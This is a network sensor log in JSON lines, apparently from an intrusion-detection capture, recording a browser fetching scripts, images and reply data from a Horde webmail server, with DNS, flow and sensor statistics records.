{"timestamp":"2020-02-29T00:27:27.115958+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.116330+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:27:27.118664+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:27:27.120068+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53188,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:27:27.121899+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":0}} 
{"timestamp":"2020-02-29T00:27:27.121238+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.121786+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} {"timestamp":"2020-02-29T00:27:27.124589+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.125654+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.165296+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} 
{"timestamp":"2020-02-29T00:27:27.165341+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:27:27.169218+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:27:27.238565+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.238886+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:27:27.240253+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":10}} 
{"timestamp":"2020-02-29T00:27:27.242259+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:27:27.243179+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":11}} {"timestamp":"2020-02-29T00:27:27.285318+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453}} 
{"timestamp":"2020-02-29T00:27:30.000182+0000","event_type":"stats","stats":{"uptime":15302,"capture":{"kernel_packets":142700,"kernel_drops":0},"decoder":{"pkts":142763,"bytes":98051560,"invalid":196,"ipv4":141162,"ipv6":10,"ethernet":142763,"raw":0,"null":0,"sll":0,"tcp":135557,"udp":5394,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089568},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2932,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2948,"synack":2939,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":789,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2468,"failed_udp":116},"tx":{"http":5092,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2552}},"flow_mgr":{"closed_pruned":2906,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11550,"memcap_state":0,"memcap_global":0},"http":{"memuse":139966,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:30.000939+0000","flow_id":1547093101856505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:29.476921+0000","end":"2020-02-29T00:22:29.588304+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:30.515394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":10}} {"timestamp":"2020-02-29T00:27:30.515611+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} 
{"timestamp":"2020-02-29T00:27:30.518621+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":11}} {"timestamp":"2020-02-29T00:27:30.518909+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52021,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39633,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:30.546775+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/answered.png","state":"CLOSED","stored":false,"size":453,"tx_id":12}} 
{"timestamp":"2020-02-29T00:27:30.561472+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484}} 
{"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.707466+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.753180+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:27:32.000618+0000","flow_id":2038445950622291,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:31.449107+0000","end":"2020-02-29T00:22:31.611622+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:32.125265+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53188,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":0}} {"timestamp":"2020-02-29T00:27:32.129074+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":1}} {"timestamp":"2020-02-29T00:27:33.000536+0000","flow_id":1323200751894490,"event_type":"flow","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.557018+0000","end":"2020-02-29T00:22:32.668240+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.000913+0000","flow_id":945608701983486,"event_type":"flow","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:31.998142+0000","end":"2020-02-29T00:22:32.109469+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.001064+0000","flow_id":385837024447768,"event_type":"flow","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.888088+0000","end":"2020-02-29T00:22:32.999298+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:27:33.001283+0000","flow_id":1660149541607404,"event_type":"flow","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":825,"bytes_toclient":648,"start":"2020-02-29T00:26:27.956396+0000","end":"2020-02-29T00:26:32.959944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:33.001618+0000","flow_id":2245167021588029,"event_type":"flow","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.753213+0000","end":"2020-02-29T00:22:32.864442+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:34.000688+0000","flow_id":467437123496173,"event_type":"flow","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1004,"bytes_toclient":798,"start":"2020-02-29T00:26:27.944365+0000","end":"2020-02-29T00:26:33.119119+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 